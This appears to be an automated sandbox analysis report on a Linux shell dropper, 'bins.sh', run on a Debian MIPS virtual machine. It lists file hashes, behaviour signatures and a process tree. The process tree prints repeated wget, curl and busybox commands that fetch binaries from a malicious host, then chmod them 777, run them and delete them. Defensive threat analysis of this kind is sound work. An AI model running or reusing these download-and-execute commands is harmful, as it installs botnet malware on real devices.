Analysis

  • max time kernel
    149s
  • max time network
    20s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    27-10-2024 10:08

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    38c016b5fafe4cb231ee103b3d469c38

  • SHA1

    11bf75788a74d2c7bf1a077fb4baedebb0fbf051

  • SHA256

    6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244

  • SHA512

    bb6b857e72ce4063f5fb64cfe1b4950071040ba0b7ae6c3bbab6db49173f1bf43357fefdcd09c87d5c69920a5366e780036c41f4d1bf597042bb693386d5e86a

  • SSDEEP

    192:C2i/8cZEED6O20nMNso9OuNSWso9Ou32i/8cLEED6Ol:C2i/8cZEED6O20nMNso9OuNSWso9Ou3Z

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 3 IoCs
  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 11 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 10 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:707
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:710
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:712
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:730
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:738
        • /bin/chmod
          chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
          2⤵
          • File and Directory Permissions Modification
          PID:740
        • /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
          ./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
          2⤵
          • Executes dropped EXE
          PID:741
        • /bin/rm
          rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
          2⤵
            PID:743
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:744
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:745
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:747
          • /bin/chmod
            chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
            2⤵
            • File and Directory Permissions Modification
            PID:748
          • /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
            ./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
            2⤵
            • Executes dropped EXE
            PID:749
          • /bin/rm
            rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
            2⤵
              PID:751
            • /usr/bin/wget
              wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:752
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
              2⤵
              • Reads runtime system information
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:753
            • /bin/busybox
              /bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:755
            • /bin/chmod
              chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
              2⤵
              • File and Directory Permissions Modification
              PID:759
            • /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
              ./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
              2⤵
              • Executes dropped EXE
              PID:760
            • /bin/rm
              rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
              2⤵
                PID:763
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS
                2⤵
                • System Network Configuration Discovery
                • Writes file to tmp directory
                PID:765
              • /usr/bin/curl
                curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS
                2⤵
                • Reads runtime system information
                • System Network Configuration Discovery
                PID:774

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH

              Filesize

              95KB

              MD5

              c20c610e14b8e59f5f8258a55fe7f27d

              SHA1

              e59a0b83d9882f2770f052a213cad25b0cbd53fc

              SHA256

              adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b

              SHA512

              dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2

            • /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG

              Filesize

              93KB

              MD5

              8fad5e89ce3d2b6159ac2ce2fdf7c084

              SHA1

              27105a304b9bb7cd8a663d1b4da1d92fd8eea355

              SHA256

              24689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6

              SHA512

              71689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc

            • /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF

              Filesize

              84KB

              MD5

              64ece99ca4ab1c1405f5a3335d64a960

              SHA1

              b7395f2320a5bdadb78943b268708965cdbd1d74

              SHA256

              aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae

              SHA512

              bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41

            • /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS

              Filesize

              101KB

              MD5

              a7e686eb3f74b104a5520f08cfd54eb5

              SHA1

              58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b

              SHA256

              617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07

              SHA512

              2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df